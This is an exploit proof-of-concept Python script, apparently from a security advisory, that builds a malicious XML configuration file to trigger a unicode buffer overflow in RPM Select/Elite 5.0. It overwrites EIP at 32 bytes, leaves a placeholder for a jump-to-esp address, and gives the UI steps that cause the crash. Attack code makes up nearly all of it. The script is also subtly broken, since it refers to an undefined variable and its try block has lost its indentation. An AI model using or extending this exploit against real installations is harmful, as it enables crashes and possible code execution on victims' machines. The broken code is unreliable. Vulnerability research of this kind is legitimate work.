RPM Select/Elite 5.0 Buffer Overflow

`#!/usr/bin/python  
# ####################################################################  
# RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC  
# Found by: mr_me - http://net-ninja.net/  
# Homepage: http://lpd.brooksnet.com/  
# Download: http://www.brooksnet.com/download-rpmselect  
# Tested on: Windows XP SP3  
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-024  
# Greetz: Corelan Security Team  
# http://www.corelan.be:8800/index.php/security/corelan-team-members/  
# ####################################################################  
# Notes: We overwrite EIP @ 32 bytes in, and the function doesnt copy   
# enough of our string to hit SEH. However modules are compiled with   
# SAFESEH anyway. Combine that with unicode and the printable ascii   
# limitations, we are presented with to much of a hurdle.  
# ####################################################################  
# How to trigger the crash:  
# file -> import configuration  
# Click on the queue name, then click on the imported transform  
# Click 'modify transform' and b00m!  
# ####################################################################  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
# Corelan does not want anyone to use this script  
# for malicious and/or illegal purposes.  
# Corelan cannot be held responsible for any illegal use.  
#  
# Note : you are not allowed to edit/modify this code.   
# If you do, Corelan cannot be held responsible for any damages.  
  
header1 = """<RPM version="5.0.70.6">  
<Queues>  
<Queue>  
<description>lol</description>  
<seqno>0</seqno>  
<enabled>1</enabled>  
<actions>1</actions>  
<held>0</held>  
<running>0</running>  
<name>mr_mes print queue</name>  
<Transforms>  
<Transform>  
<LineWrap>0</LineWrap>  
<lfPitchAndFamily>48</lfPitchAndFamily>  
<lfOrientation>0</lfOrientation>  
<lfFaceName>  
"""  
  
header2 = """</lfFaceName>  
<lfWidth>0</lfWidth>  
<UseCharsPerInch>0</UseCharsPerInch>  
<lfItalic>0</lfItalic>  
<UseLinesPerPage>0</UseLinesPerPage>  
<lfEscapement>0</lfEscapement>  
<LinesPerInch>6.000000</LinesPerInch>  
<type>24</type>  
<LeftMargin>0.500000</LeftMargin>  
<PortraitMax>90</PortraitMax>  
<CharsPerInch>10.000000</CharsPerInch>  
<CharsPerLine>80</CharsPerLine>  
<TopMargin>0.500000</TopMargin>  
<LinesPerPage>60</LinesPerPage>  
<lfQuality>2</lfQuality>  
<lfStrikeOut>0</lfStrikeOut>  
<lfWeight>400</lfWeight>  
<FontSize>12</FontSize>  
<lfUnderline>0</lfUnderline>  
<BottomMargin>0.500000</BottomMargin>  
<Orientation>portrait</Orientation>  
<InputFormat>1252</InputFormat>  
<CalcLayout>false</CalcLayout>  
<UseLinesPerInch>1</UseLinesPerInch>  
<RightMargin>0.500000</RightMargin>  
<CtrlStrip>1</CtrlStrip>  
<UseCharsPerLine>0</UseCharsPerLine>  
<lfCharSet>1</lfCharSet>  
<lfOutPrecision>0</lfOutPrecision>  
<lfClipPrecision>0</lfClipPrecision>  
<SuppressBlankPage>1</SuppressBlankPage>  
<lfHeight>-16</lfHeight>  
</Transform>  
</Transforms>  
<Jobs />  
</Queue>  
</Queues>  
<Hosts />  
</RPM>  
"""  
  
payload = "\x41" * 32  
payload += "\x42\x42" # your "jmp to esp" instruction should go here  
payload += "\x44" * (5000-len(buffer))  
exploit = header1.rstrip() + payload.rstrip() + header2.rstrip()  
try:  
f=open("cst-rpm-config.xml",'w')  
f.write(exploit)  
f.close()  
print "[+] File created successfully !"  
except:  
print "[-] Error cannot write xml file to system\n"  
`